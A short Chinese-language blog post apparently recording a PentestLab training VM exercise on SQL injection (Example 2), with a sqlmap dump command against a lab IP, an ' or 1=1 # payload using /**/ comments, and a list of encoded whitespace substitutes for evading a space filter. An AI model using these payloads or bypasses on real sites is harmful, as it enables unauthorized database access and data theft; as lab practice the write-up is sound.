PentestLab-web安全SQL注入-EXP2

孟佳

关注

阅读 44

2023-03-11


我们打开pentestlab靶机

选择“sql  injections ”

选择“Example2”


PentestLab-web安全SQL注入-EXP2_多行注释


观察页面


PentestLab-web安全SQL注入-EXP2_sql_02


发现name是注入点


使用工具测试

sqlmap参数为


python sqlmap.py -u "http://192.168.29.148/sqli/example2.php?name=admin" --dump all


PentestLab-web安全SQL注入-EXP2_多行注释_03


机器太卡了


我们使用手工注入

万能密码


%27/**/or/**/1=1/**/%23  相当于 ' or 1=1 #


PentestLab-web安全SQL注入-EXP2_sql_04


换虚拟机

工具测试


PentestLab-web安全SQL注入-EXP2_sql_05


也卡住

(那就休息)


我们打开靶机

查看源代码


PentestLab-web安全SQL注入-EXP2_python_06


将空格进行过滤

然后其他编码没有过滤。

1、%09 TAB 键(水平)

2、%0a 新建一行

3、%0c 新的一页

4、%0d return 功能

5、%0b TAB 键(垂直)

6、%a0 空格

7、/**/ 多行注释

精彩评论(0)

0 0 举报